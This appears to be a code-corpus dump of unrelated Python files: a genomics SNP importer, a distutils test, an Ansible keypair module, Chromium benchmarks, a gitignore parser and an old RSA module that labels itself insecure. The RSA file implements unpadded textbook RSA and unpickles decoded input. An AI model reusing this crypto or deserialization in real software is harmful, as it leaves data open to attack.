species = parser.get('set_infos', 'species').lower()
genomeSource = parser.get('set_infos', 'source')
snpsFileTmp = parser.get('snps', 'filename').strip()
snpsFile = _getFile(parser.get('snps', 'filename'), packageDir)
try :
SMaster = SNPMaster(setName = setName)
except KeyError :
if typ.lower() == 'casavasnp' :
return _importSNPs_CasavaSNP(setName, species, genomeSource, snpsFile)
elif typ.lower() == 'dbsnpsnp' :
return _importSNPs_dbSNPSNP(setName, species, genomeSource, snpsFile)
elif typ.lower() == 'topHatsnp' :
return _importSNPs_TopHatSNP(setName, species, genomeSource, snpsFile)
elif typ.lower() == 'agnosticsnp' :
return _importSNPs_AgnosticSNP(setName, species, genomeSource, snpsFile)
else :
raise FutureWarning('Unknown SNP type in manifest %s' % typ)
else :
raise KeyError("There's already a SNP set by the name %s. Use deleteSNPs() to remove it first" %setName)
shutil.rmtree(packageDir)
def deleteSNPs(setName) :
"""deletes a set of polymorphisms"""
con = conf.db
try :
SMaster = SNPMaster(setName = setName)
con.beginTransaction()
SNPType = SMaster.SNPType
con.delete(SNPType, 'setName = ?', (setName,))
SMaster.delete()
con.endTransaction()
except KeyError :
raise KeyError("Can't delete the setName %s because i can't find it in SNPMaster, maybe there's not set by that name" % setName)
#~ printf("can't delete the setName %s because i can't find it in SNPMaster, maybe there's no set by that name" % setName)
return False
return True
def _importSNPs_AgnosticSNP(setName, species, genomeSource, snpsFile) :
"This function will also create an index on start->chromosomeNumber->setName. Warning : pyGeno wil interpret all positions as 0 based"
printf('importing SNP set %s for species %s...' % (setName, species))
snpData = CSVFile()
snpData.parse(snpsFile, separator = "\t")
AgnosticSNP.dropIndex(('start', 'chromosomeNumber', 'setName'))
conf.db.beginTransaction()
pBar = ProgressBar(len(snpData))
pLabel = ''
currChrNumber = None
for snpEntry in snpData :
tmpChr = snpEntry['chromosomeNumber']
if tmpChr != currChrNumber :
currChrNumber = tmpChr
pLabel = 'Chr %s...' % currChrNumber
snp = AgnosticSNP()
snp.species = species
snp.setName = setName
for f in snp.getFields() :
try :
setattr(snp, f, snpEntry[f])
except KeyError :
if f != 'species' and f != 'setName' :
printf("Warning filetype as no key %s", f)
snp.start = int(snp.start)
snp.end = int(snp.end)
snp.save()
pBar.update(label = pLabel)
pBar.close()
snpMaster = SNPMaster()
snpMaster.set(setName = setName, SNPType = 'AgnosticSNP', species = species)
snpMaster.save()
printf('saving...')
conf.db.endTransaction()
printf('creating indexes...')
CasavaSNP.ensureGlobalIndex(('start', 'chromosomeNumber', 'setName'))
printf('importation of SNP set %s for species %s done.' %(setName, species))
return True
def _importSNPs_CasavaSNP(setName, species, genomeSource, snpsFile) :
"This function will also create an index on start->chromosomeNumber->setName. Warning : pyGeno positions are 0 based"
printf('importing SNP set %s for species %s...' % (setName, species))
snpData = SNPsTxtFile(snpsFile)
CasavaSNP.dropIndex(('start', 'chromosomeNumber', 'setName'))
conf.db.beginTransaction()
pBar = ProgressBar(len(snpData))
pLabel = ''
currChrNumber = None
for snpEntry in snpData :
tmpChr = snpEntry['chromosomeNumber']
if tmpChr != currChrNumber :
currChrNumber = tmpChr
pLabel = 'Chr %s...' % currChrNumber
snp = CasavaSNP()
snp.species = species
snp.setName = setName
for f in snp.getFields() :
try :
setattr(snp, f, snpEntry[f])
except KeyError :
if f != 'species' and f != 'setName' :
printf("Warning filetype as no key %s", f)
snp.start -= 1
snp.end -= 1
snp.save()
pBar.update(label = pLabel)
pBar.close()
snpMaster = SNPMaster()
snpMaster.set(setName = setName, SNPType = 'CasavaSNP', species = species)
snpMaster.save()
printf('saving...')
conf.db.endTransaction()
printf('creating indexes...')
CasavaSNP.ensureGlobalIndex(('start', 'chromosomeNumber', 'setName'))
printf('importation of SNP set %s for species %s done.' %(setName, species))
return True
def _importSNPs_dbSNPSNP(setName, species, genomeSource, snpsFile) :
"This function will also create an index on start->chromosomeNumber->setName. Warning : pyGeno positions are 0 based"
snpData = VCFFile(snpsFile, gziped = True, stream = True)
dbSNPSNP.dropIndex(('start', 'chromosomeNumber', 'setName'))
conf.db.beginTransaction()
pBar = ProgressBar()
pLabel = ''
for snpEntry in snpData :
pBar.update(label = 'Chr %s, %s...' % (snpEntry['#CHROM'], snpEntry['ID']))
snp = dbSNPSNP()
for f in snp.getFields() :
try :
setattr(snp, f, snpEntry[f])
except KeyError :
pass
snp.chromosomeNumber = snpEntry['#CHROM']
snp.species = species
snp.setName = setName
snp.start = snpEntry['POS']-1
snp.alt = snpEntry['ALT']
snp.ref = snpEntry['REF']
snp.end = snp.start+len(snp.alt)
snp.save()
pBar.close()
snpMaster = SNPMaster()
snpMaster.set(setName = setName, SNPType = 'dbSNPSNP', species = species)
snpMaster.save()
printf('saving...')
conf.db.endTransaction()
printf('creating indexes...')
dbSNPSNP.ensureGlobalIndex(('start', 'chromosomeNumber', 'setName'))
printf('importation of SNP set %s for species %s done.' %(setName, species))
return True
def _importSNPs_TopHatSNP(setName, species, genomeSource, snpsFile) :
raise FutureWarning('Not implemented yet')
|
apache-2.0
|
dreamsxin/kbengine
|
kbe/res/scripts/common/Lib/distutils/tests/test_cmd.py
|
118
|
3835
|
"""Tests for distutils.cmd."""
import unittest
import os
from test.support import captured_stdout, run_unittest
from distutils.cmd import Command
from distutils.dist import Distribution
from distutils.errors import DistutilsOptionError
from distutils import debug
class MyCmd(Command):
def initialize_options(self):
pass
class CommandTestCase(unittest.TestCase):
def setUp(self):
dist = Distribution()
self.cmd = MyCmd(dist)
def test_ensure_string_list(self):
cmd = self.cmd
cmd.not_string_list = ['one', 2, 'three']
cmd.yes_string_list = ['one', 'two', 'three']
cmd.not_string_list2 = object()
cmd.yes_string_list2 = 'ok'
cmd.ensure_string_list('yes_string_list')
cmd.ensure_string_list('yes_string_list2')
self.assertRaises(DistutilsOptionError,
cmd.ensure_string_list, 'not_string_list')
self.assertRaises(DistutilsOptionError,
cmd.ensure_string_list, 'not_string_list2')
cmd.option1 = 'ok,dok'
cmd.ensure_string_list('option1')
self.assertEqual(cmd.option1, ['ok', 'dok'])
cmd.option2 = ['xxx', 'www']
cmd.ensure_string_list('option2')
cmd.option3 = ['ok', 2]
self.assertRaises(DistutilsOptionError, cmd.ensure_string_list,
'option3')
def test_make_file(self):
cmd = self.cmd
# making sure it raises when infiles is not a string or a list/tuple
self.assertRaises(TypeError, cmd.make_file,
infiles=1, outfile='', func='func', args=())
# making sure execute gets called properly
def _execute(func, args, exec_msg, level):
self.assertEqual(exec_msg, 'generating out from in')
cmd.force = True
cmd.execute = _execute
cmd.make_file(infiles='in', outfile='out', func='func', args=())
def test_dump_options(self):
msgs = []
def _announce(msg, level):
msgs.append(msg)
cmd = self.cmd
cmd.announce = _announce
cmd.option1 = 1
cmd.option2 = 1
cmd.user_options = [('option1', '', ''), ('option2', '', '')]
cmd.dump_options()
wanted = ["command options for 'MyCmd':", ' option1 = 1',
' option2 = 1']
self.assertEqual(msgs, wanted)
def test_ensure_string(self):
cmd = self.cmd
cmd.option1 = 'ok'
cmd.ensure_string('option1')
cmd.option2 = None
cmd.ensure_string('option2', 'xxx')
self.assertTrue(hasattr(cmd, 'option2'))
cmd.option3 = 1
self.assertRaises(DistutilsOptionError, cmd.ensure_string, 'option3')
def test_ensure_filename(self):
cmd = self.cmd
cmd.option1 = __file__
cmd.ensure_filename('option1')
cmd.option2 = 'xxx'
self.assertRaises(DistutilsOptionError, cmd.ensure_filename, 'option2')
def test_ensure_dirname(self):
cmd = self.cmd
cmd.option1 = os.path.dirname(__file__) or os.curdir
cmd.ensure_dirname('option1')
cmd.option2 = 'xxx'
self.assertRaises(DistutilsOptionError, cmd.ensure_dirname, 'option2')
def test_debug_print(self):
cmd = self.cmd
with captured_stdout() as stdout:
cmd.debug_print('xxx')
stdout.seek(0)
self.assertEqual(stdout.read(), '')
debug.DEBUG = True
try:
with captured_stdout() as stdout:
cmd.debug_print('xxx')
stdout.seek(0)
self.assertEqual(stdout.read(), 'xxx\n')
finally:
debug.DEBUG = False
def test_suite():
return unittest.makeSuite(CommandTestCase)
if __name__ == '__main__':
run_unittest(test_suite())
|
lgpl-3.0
|
tersmitten/ansible-modules-core
|
cloud/rackspace/rax_keypair.py
|
157
|
4957
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
DOCUMENTATION = '''
---
module: rax_keypair
short_description: Create a keypair for use with Rackspace Cloud Servers
description:
- Create a keypair for use with Rackspace Cloud Servers
version_added: 1.5
options:
name:
description:
- Name of keypair
required: true
public_key:
description:
- Public Key string to upload. Can be a file path or string
default: null
state:
description:
- Indicate desired state of the resource
choices:
- present
- absent
default: present
author: "Matt Martz (@sivel)"
notes:
- Keypairs cannot be manipulated, only created and deleted. To "update" a
keypair you must first delete and then recreate.
- The ability to specify a file path for the public key was added in 1.7
extends_documentation_fragment: rackspace.openstack
'''
EXAMPLES = '''
- name: Create a keypair
hosts: localhost
gather_facts: False
tasks:
- name: keypair request
local_action:
module: rax_keypair
credentials: ~/.raxpub
name: my_keypair
region: DFW
register: keypair
- name: Create local public key
local_action:
module: copy
content: "{{ keypair.keypair.public_key }}"
dest: "{{ inventory_dir }}/{{ keypair.keypair.name }}.pub"
- name: Create local private key
local_action:
module: copy
content: "{{ keypair.keypair.private_key }}"
dest: "{{ inventory_dir }}/{{ keypair.keypair.name }}"
- name: Create a keypair
hosts: localhost
gather_facts: False
tasks:
- name: keypair request
local_action:
module: rax_keypair
credentials: ~/.raxpub
name: my_keypair
public_key: "{{ lookup('file', 'authorized_keys/id_rsa.pub') }}"
region: DFW
register: keypair
'''
try:
import pyrax
HAS_PYRAX = True
except ImportError:
HAS_PYRAX = False
def rax_keypair(module, name, public_key, state):
changed = False
cs = pyrax.cloudservers
if cs is None:
module.fail_json(msg='Failed to instantiate client. This '
'typically indicates an invalid region or an '
'incorrectly capitalized region name.')
keypair = {}
if state == 'present':
if public_key and os.path.isfile(public_key):
try:
f = open(public_key)
public_key = f.read()
f.close()
except Exception, e:
module.fail_json(msg='Failed to load %s' % public_key)
try:
keypair = cs.keypairs.find(name=name)
except cs.exceptions.NotFound:
try:
keypair = cs.keypairs.create(name, public_key)
changed = True
except Exception, e:
module.fail_json(msg='%s' % e.message)
except Exception, e:
module.fail_json(msg='%s' % e.message)
elif state == 'absent':
try:
keypair = cs.keypairs.find(name=name)
except:
pass
if keypair:
try:
keypair.delete()
changed = True
except Exception, e:
module.fail_json(msg='%s' % e.message)
module.exit_json(changed=changed, keypair=rax_to_dict(keypair))
def main():
argument_spec = rax_argument_spec()
argument_spec.update(
dict(
name=dict(required=True),
public_key=dict(),
state=dict(default='present', choices=['absent', 'present']),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
required_together=rax_required_together(),
)
if not HAS_PYRAX:
module.fail_json(msg='pyrax is required for this module')
name = module.params.get('name')
public_key = module.params.get('public_key')
state = module.params.get('state')
setup_rax_module(module, pyrax)
rax_keypair(module, name, public_key, state)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
### invoke the module
main()
|
gpl-3.0
|
ltilve/chromium
|
tools/perf/benchmarks/smoothness.py
|
1
|
9502
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry import benchmark
from benchmarks import silk_flags
from benchmarks import webgl_expectations
from measurements import smoothness
import page_sets
class SmoothnessTop25(benchmark.Benchmark):
"""Measures rendering statistics while scrolling down the top 25 web pages.
http://www.chromium.org/developers/design-documents/rendering-benchmarks
"""
test = smoothness.Smoothness
page_set = page_sets.Top25SmoothPageSet
@classmethod
def Name(cls):
return 'smoothness.top_25_smooth'
class SmoothnessToughFiltersCases(benchmark.Benchmark):
"""Measures frame rate and a variety of other statistics.
Uses a selection of pages making use of SVG and CSS Filter Effects.
"""
test = smoothness.Smoothness
page_set = page_sets.ToughFiltersCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.tough_filters_cases'
# crbug.com/388877, crbug.com/396127
@benchmark.Disabled('mac', 'win', 'android')
class SmoothnessToughCanvasCases(benchmark.Benchmark):
"""Measures frame rate and a variety of other statistics.
Uses a selection of pages making use of the 2D Canvas API.
"""
test = smoothness.Smoothness
page_set = page_sets.ToughCanvasCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.tough_canvas_cases'
@benchmark.Disabled('android') # crbug.com/373812
class SmoothnessToughWebGLCases(benchmark.Benchmark):
test = smoothness.Smoothness
page_set = page_sets.ToughWebglCasesPageSet
@classmethod
def CreateExpectations(cls):
return webgl_expectations.WebGLExpectations()
@classmethod
def Name(cls):
return 'smoothness.tough_webgl_cases'
@benchmark.Enabled('android')
class SmoothnessMaps(benchmark.Benchmark):
test = smoothness.Smoothness
page_set = page_sets.MapsPageSet
@classmethod
def CreateExpectations(cls):
return webgl_expectations.MapsExpectations()
@classmethod
def Name(cls):
return 'smoothness.maps'
@benchmark.Disabled('android')
class SmoothnessKeyDesktopMoveCases(benchmark.Benchmark):
test = smoothness.Smoothness
page_set = page_sets.KeyDesktopMoveCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.key_desktop_move_cases'
@benchmark.Enabled('android')
class SmoothnessKeyMobileSites(benchmark.Benchmark):
"""Measures rendering statistics while scrolling down the key mobile sites.
http://www.chromium.org/developers/design-documents/rendering-benchmarks
"""
test = smoothness.Smoothness
page_set = page_sets.KeyMobileSitesSmoothPageSet
@classmethod
def Name(cls):
return 'smoothness.key_mobile_sites_smooth'
class SmoothnessToughAnimationCases(benchmark.Benchmark):
test = smoothness.Smoothness
page_set = page_sets.ToughAnimationCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.tough_animation_cases'
@benchmark.Enabled('android')
class SmoothnessKeySilkCases(benchmark.Benchmark):
"""Measures rendering statistics for the key silk cases without GPU
rasterization.
"""
test = smoothness.Smoothness
page_set = page_sets.KeySilkCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.key_silk_cases'
@benchmark.Enabled('android')
class SmoothnessGpuRasterizationTop25(benchmark.Benchmark):
"""Measures rendering statistics for the top 25 with GPU rasterization.
"""
tag = 'gpu_rasterization'
test = smoothness.Smoothness
page_set = page_sets.Top25SmoothPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForGpuRasterization(options)
@classmethod
def Name(cls):
return 'smoothness.gpu_rasterization.top_25_smooth'
@benchmark.Enabled('android')
class SmoothnessGpuRasterizationKeyMobileSites(benchmark.Benchmark):
"""Measures rendering statistics for the key mobile sites with GPU
rasterization.
"""
tag = 'gpu_rasterization'
test = smoothness.Smoothness
page_set = page_sets.KeyMobileSitesSmoothPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForGpuRasterization(options)
@classmethod
def Name(cls):
return 'smoothness.gpu_rasterization.key_mobile_sites_smooth'
@benchmark.Enabled('android')
class SmoothnessSyncScrollKeyMobileSites(benchmark.Benchmark):
"""Measures rendering statistics for the key mobile sites with synchronous
(main thread) scrolling.
"""
tag = 'sync_scroll'
test = smoothness.Smoothness
page_set = page_sets.KeyMobileSitesSmoothPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForSyncScrolling(options)
@classmethod
def Name(cls):
return 'smoothness.sync_scroll.key_mobile_sites_smooth'
@benchmark.Enabled('android')
class SmoothnessSimpleMobilePages(benchmark.Benchmark):
"""Measures rendering statistics for simple mobile sites page set.
"""
test = smoothness.Smoothness
page_set = page_sets.SimpleMobileSitesPageSet
@classmethod
def Name(cls):
return 'smoothness.simple_mobile_sites'
@benchmark.Enabled('android')
class SmoothnessFlingSimpleMobilePages(benchmark.Benchmark):
"""Measures rendering statistics for flinging a simple mobile sites page set.
"""
test = smoothness.Smoothness
page_set = page_sets.SimpleMobileSitesFlingPageSet
def CustomizeBrowserOptions(self, options):
# As the fling parameters cannot be analytically determined to not
# overscroll, disable overscrolling explicitly. Overscroll behavior is
# orthogonal to fling performance, and its activation is only more noise.
options.AppendExtraBrowserArgs('--disable-overscroll-edge-effect')
@classmethod
def Name(cls):
return 'smoothness.fling.simple_mobile_sites'
@benchmark.Enabled('android', 'chromeos')
class SmoothnessToughPinchZoomCases(benchmark.Benchmark):
"""Measures rendering statistics for pinch-zooming into the tough pinch zoom
cases.
"""
test = smoothness.Smoothness
page_set = page_sets.ToughPinchZoomCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.tough_pinch_zoom_cases'
@benchmark.Enabled('chromeos')
class SmoothnessToughScrollingWhileZoomedInCases(benchmark.Benchmark):
"""Measures rendering statistics for pinch-zooming then diagonal scrolling"""
test = smoothness.Smoothness
page_set = page_sets.ToughScrollingWhileZoomedInCasesPageSet
@classmethod
def Name(cls):
return 'smoothness.tough_scrolling_while_zoomed_in_cases'
@benchmark.Enabled('android')
class SmoothnessPolymer(benchmark.Benchmark):
"""Measures rendering statistics for Polymer cases.
"""
test = smoothness.Smoothness
page_set = page_sets.PolymerPageSet
@classmethod
def Name(cls):
return 'smoothness.polymer'
@benchmark.Enabled('android')
class SmoothnessGpuRasterizationPolymer(benchmark.Benchmark):
"""Measures rendering statistics for the Polymer cases with GPU rasterization.
"""
tag = 'gpu_rasterization'
test = smoothness.Smoothness
page_set = page_sets.PolymerPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForGpuRasterization(options)
@classmethod
def Name(cls):
return 'smoothness.gpu_rasterization.polymer'
class SmoothnessToughFastScrollingCases(benchmark.Benchmark):
test = smoothness.Smoothness
page_set = page_sets.ToughScrollingCasesPageSet
options = {'story_label_filter': 'fastscrolling'}
@classmethod
def Name(cls):
return 'smoothness.tough_scrolling_cases'
class SmoothnessImageDecodingCases(benchmark.Benchmark):
"""Measures decoding statistics for jpeg images.
"""
test = smoothness.Smoothness
page_set = page_sets.ImageDecodingCasesPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForGpuRasterization(options)
options.AppendExtraBrowserArgs('--disable-accelerated-jpeg-decoding')
@classmethod
def Name(cls):
return 'smoothness.image_decoding_cases'
class SmoothnessGpuImageDecodingCases(benchmark.Benchmark):
"""Measures decoding statistics for jpeg images with GPU rasterization.
"""
tag = 'gpu_rasterization_and_decoding'
test = smoothness.Smoothness
page_set = page_sets.ImageDecodingCasesPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForGpuRasterization(options)
# TODO(sugoi): Remove the following line once M41 goes stable
options.AppendExtraBrowserArgs('--enable-accelerated-jpeg-decoding')
@classmethod
def Name(cls):
return 'smoothness.gpu_rasterization_and_decoding.image_decoding_cases'
@benchmark.Enabled('android')
class SmoothnessPathologicalMobileSites(benchmark.Benchmark):
"""Measures task execution statistics while scrolling pathological sites.
"""
test = smoothness.Smoothness
page_set = page_sets.PathologicalMobileSitesPageSet
@classmethod
def Name(cls):
return 'smoothness.pathological_mobile_sites'
@benchmark.Enabled('android')
class SmoothnessSyncScrollPathologicalMobileSites(benchmark.Benchmark):
"""Measures task execution statistics while sync-scrolling pathological sites.
"""
tag = 'sync_scroll'
test = smoothness.Smoothness
page_set = page_sets.PathologicalMobileSitesPageSet
def CustomizeBrowserOptions(self, options):
silk_flags.CustomizeBrowserOptionsForSyncScrolling(options)
@classmethod
def Name(cls):
return 'smoothness.sync_scroll.pathological_mobile_sites'
|
bsd-3-clause
|
omakk/servo
|
tests/wpt/web-platform-tests/tools/gitignore/gitignore.py
|
90
|
3939
|
import itertools
import re
import os
end_space = re.compile(r"([^\\]\s)*$")
def fnmatch_translate(pat, path_name=False):
parts = []
seq = False
i = 0
if pat[0] == "/" or path_name:
parts.append("^")
any_char = "[^/]"
if pat[0] == "/":
pat = pat[1:]
else:
any_char = "."
parts.append("^(?:.*/)?")
while i < len(pat):
c = pat[i]
if c == "\\":
if i < len(pat) - 1:
i += 1
c = pat[i]
parts.append(re.escape(c))
else:
raise ValueError
elif seq:
if c == "]":
seq = False
# First two cases are to deal with the case where / is the only character
# in the sequence but path_name is True so it shouldn't match anything
if parts[-1] == "[":
parts = parts[:-1]
elif parts[-1] == "^" and parts[-2] == "[":
parts = parts[:-2]
else:
parts.append(c)
elif c == "-":
parts.append(c)
elif not (path_name and c == "/"):
parts += re.escape(c)
elif c == "[":
parts.append("[")
if i < len(pat) - 1 and pat[i+1] in ("!", "^"):
parts.append("^")
i += 1
seq = True
elif c == "*":
if i < len(pat) - 1 and pat[i+1] == "*":
parts.append(any_char + "*")
i += 1
if i < len(pat) - 1 and pat[i+1] == "*":
raise ValueError
else:
parts.append(any_char + "*")
elif c == "?":
parts.append(any_char)
else:
parts.append(re.escape(c))
i += 1
if seq:
raise ValueError
parts.append("$")
try:
return re.compile("".join(parts))
except:
raise
def parse_line(line):
line = line.rstrip()
if not line or line[0] == "#":
return
invert = line[0] == "!"
if invert:
line = line[1:]
dir_only = line[-1] == "/"
if dir_only:
line = line[:-1]
return invert, dir_only, fnmatch_translate(line, "/" in line)
class PathFilter(object):
def __init__(self, root, extras=None):
if root:
ignore_path = os.path.join(root, ".gitignore")
else:
ignore_path = None
if not ignore_path and not extras:
self.trivial = True
return
self.trivial = False
self.rules_file = []
self.rules_dir = []
if extras is None:
extras = []
if ignore_path and os.path.exists(ignore_path):
self._read_ignore(ignore_path)
for item in extras:
self._read_line(item)
def _read_ignore(self, ignore_path):
with open(ignore_path) as f:
for line in f:
self._read_line(line)
def _read_line(self, line):
parsed = parse_line(line)
if not parsed:
return
invert, dir_only, regexp = parsed
if dir_only:
self.rules_dir.append((regexp, invert))
else:
self.rules_file.append((regexp, invert))
def __call__(self, path):
if os.path.sep != "/":
path = path.replace(os.path.sep, "/")
if self.trivial:
return True
path_is_dir = path[-1] == "/"
if path_is_dir:
path = path[:-1]
rules = self.rules_dir
else:
rules = self.rules_file
include = True
for regexp, invert in rules:
if not include and invert and regexp.match(path):
include = True
elif include and not invert and regexp.match(path):
include = False
return include
|
mpl-2.0
|
ByteMail/ByteMail
|
rsa/_version133.py
|
177
|
11274
|
"""RSA module
pri = k[1] //Private part of keys d,p,q
Module for calculating large primes, and RSA encryption, decryption,
signing and verification. Includes generating public and private keys.
WARNING: this code implements the mathematics of RSA. It is not suitable for
real-world secure cryptography purposes. It has not been reviewed by a security
expert. It does not include padding of data. There are many ways in which the
output of this module, when used without any modification, can be sucessfully
attacked.
"""
__author__ = "Sybren Stuvel, Marloes de Boer and Ivo Tamboer"
__date__ = "2010-02-05"
__version__ = '1.3.3'
# NOTE: Python's modulo can return negative numbers. We compensate for
# this behaviour using the abs() function
from cPickle import dumps, loads
import base64
import math
import os
import random
import sys
import types
import zlib
from rsa._compat import byte
# Display a warning that this insecure version is imported.
import warnings
warnings.warn('Insecure version of the RSA module is imported as %s, be careful'
% __name__)
def gcd(p, q):
"""Returns the greatest common divisor of p and q
>>> gcd(42, 6)
6
"""
if p<q: return gcd(q, p)
if q == 0: return p
return gcd(q, abs(p%q))
def bytes2int(bytes):
"""Converts a list of bytes or a string to an integer
>>> (128*256 + 64)*256 + + 15
8405007
>>> l = [128, 64, 15]
>>> bytes2int(l)
8405007
"""
if not (type(bytes) is types.ListType or type(bytes) is types.StringType):
raise TypeError("You must pass a string or a list")
# Convert byte stream to integer
integer = 0
for byte in bytes:
integer *= 256
if type(byte) is types.StringType: byte = ord(byte)
integer += byte
return integer
def int2bytes(number):
"""Converts a number to a string of bytes
>>> bytes2int(int2bytes(123456789))
123456789
"""
if not (type(number) is types.LongType or type(number) is types.IntType):
raise TypeError("You must pass a long or an int")
string = ""
while number > 0:
string = "%s%s" % (byte(number & 0xFF), string)
number /= 256
return string
def fast_exponentiation(a, p, n):
"""Calculates r = a^p mod n
"""
result = a % n
remainders = []
while p != 1:
remainders.append(p & 1)
p = p >> 1
while remainders:
rem = remainders.pop()
result = ((a ** rem) * result ** 2) % n
return result
def read_random_int(nbits):
"""Reads a random integer of approximately nbits bits rounded up
to whole bytes"""
nbytes = ceil(nbits/8.)
randomdata = os.urandom(nbytes)
return bytes2int(randomdata)
def ceil(x):
"""ceil(x) -> int(math.ceil(x))"""
return int(math.ceil(x))
def randint(minvalue, maxvalue):
"""Returns a random integer x with minvalue <= x <= maxvalue"""
# Safety - get a lot of random data even if the range is fairly
# small
min_nbits = 32
# The range of the random numbers we need to generate
range = maxvalue - minvalue
# Which is this number of bytes
rangebytes = ceil(math.log(range, 2) / 8.)
# Convert to bits, but make sure it's always at least min_nbits*2
rangebits = max(rangebytes * 8, min_nbits * 2)
# Take a random number of bits between min_nbits and rangebits
nbits = random.randint(min_nbits, rangebits)
return (read_random_int(nbits) % range) + minvalue
def fermat_little_theorem(p):
"""Returns 1 if p may be prime, and something else if p definitely
is not prime"""
a = randint(1, p-1)
return fast_exponentiation(a, p-1, p)
def jacobi(a, b):
"""Calculates the value of the Jacobi symbol (a/b)
"""
if a % b == 0:
return 0
result = 1
while a > 1:
if a & 1:
if ((a-1)*(b-1) >> 2) & 1:
result = -result
b, a = a, b % a
else:
if ((b ** 2 - 1) >> 3) & 1:
result = -result
a = a >> 1
return result
def jacobi_witness(x, n):
"""Returns False if n is an Euler pseudo-prime with base x, and
True otherwise.
"""
j = jacobi(x, n) % n
f = fast_exponentiation(x, (n-1)/2, n)
if j == f: return False
return True
def randomized_primality_testing(n, k):
"""Calculates whether n is composite (which is always correct) or
prime (which is incorrect with error probability 2**-k)
Returns False if the number if composite, and True if it's
probably prime.
"""
q = 0.5 # Property of the jacobi_witness function
# t = int(math.ceil(k / math.log(1/q, 2)))
t = ceil(k / math.log(1/q, 2))
for i in range(t+1):
x = randint(1, n-1)
if jacobi_witness(x, n): return False
return True
def is_prime(number):
"""Returns True if the number is prime, and False otherwise.
>>> is_prime(42)
0
>>> is_prime(41)
1
"""
"""
if not fermat_little_theorem(number) == 1:
# Not prime, according to Fermat's little theorem
return False
"""
if randomized_primality_testing(number, 5):
# Prime, according to Jacobi
return True
# Not prime
return False
def getprime(nbits):
"""Returns a prime number of max. 'math.ceil(nbits/8)*8' bits. In
other words: nbits is rounded up to whole bytes.
>>> p = getprime(8)
>>> is_prime(p-1)
0
>>> is_prime(p)
1
>>> is_prime(p+1)
0
"""
nbytes = int(math.ceil(nbits/8.))
while True:
integer = read_random_int(nbits)
# Make sure it's odd
integer |= 1
# Test for primeness
if is_prime(integer): break
# Retry if not prime
return integer
def are_relatively_prime(a, b):
"""Returns True if a and b are relatively prime, and False if they
are not.
>>> are_relatively_prime(2, 3)
1
>>> are_relatively_prime(2, 4)
0
"""
d = gcd(a, b)
return (d == 1)
def find_p_q(nbits):
"""Returns a tuple of two different primes of nbits bits"""
p = getprime(nbits)
while True:
q = getprime(nbits)
if not q == p: break
return (p, q)
def extended_euclid_gcd(a, b):
"""Returns a tuple (d, i, j) such that d = gcd(a, b) = ia + jb
"""
if b == 0:
return (a, 1, 0)
q = abs(a % b)
r = long(a / b)
(d, k, l) = extended_euclid_gcd(b, q)
return (d, l, k - l*r)
# Main function: calculate encryption and decryption keys
def calculate_keys(p, q, nbits):
"""Calculates an encryption and a decryption key for p and q, and
returns them as a tuple (e, d)"""
n = p * q
phi_n = (p-1) * (q-1)
while True:
# Make sure e has enough bits so we ensure "wrapping" through
# modulo n
e = getprime(max(8, nbits/2))
if are_relatively_prime(e, n) and are_relatively_prime(e, phi_n): break
(d, i, j) = extended_euclid_gcd(e, phi_n)
if not d == 1:
raise Exception("e (%d) and phi_n (%d) are not relatively prime" % (e, phi_n))
if not (e * i) % phi_n == 1:
raise Exception("e (%d) and i (%d) are not mult. inv. modulo phi_n (%d)" % (e, i, phi_n))
return (e, i)
def gen_keys(nbits):
"""Generate RSA keys of nbits bits. Returns (p, q, e, d).
Note: this can take a long time, depending on the key size.
"""
while True:
(p, q) = find_p_q(nbits)
(e, d) = calculate_keys(p, q, nbits)
# For some reason, d is sometimes negative. We don't know how
# to fix it (yet), so we keep trying until everything is shiny
if d > 0: break
return (p, q, e, d)
def gen_pubpriv_keys(nbits):
"""Generates public and private keys, and returns them as (pub,
priv).
The public key consists of a dict {e: ..., , n: ....). The private
key consists of a dict {d: ...., p: ...., q: ....).
"""
(p, q, e, d) = gen_keys(nbits)
return ( {'e': e, 'n': p*q}, {'d': d, 'p': p, 'q': q} )
def encrypt_int(message, ekey, n):
"""Encrypts a message using encryption key 'ekey', working modulo
n"""
if type(message) is types.IntType:
return encrypt_int(long(message), ekey, n)
if not type(message) is types.LongType:
raise TypeError("You must pass a long or an int")
if message > 0 and \
math.floor(math.log(message, 2)) > math.floor(math.log(n, 2)):
raise OverflowError("The message is too long")
return fast_exponentiation(message, ekey, n)
def decrypt_int(cyphertext, dkey, n):
"""Decrypts a cypher text using the decryption key 'dkey', working
modulo n"""
return encrypt_int(cyphertext, dkey, n)
def sign_int(message, dkey, n):
"""Signs 'message' using key 'dkey', working modulo n"""
return decrypt_int(message, dkey, n)
def verify_int(signed, ekey, n):
"""verifies 'signed' using key 'ekey', working modulo n"""
return encrypt_int(signed, ekey, n)
def picklechops(chops):
"""Pickles and base64encodes it's argument chops"""
value = zlib.compress(dumps(chops))
encoded = base64.encodestring(value)
return encoded.strip()
def unpicklechops(string):
"""base64decodes and unpickes it's argument string into chops"""
return loads(zlib.decompress(base64.decodestring(string)))
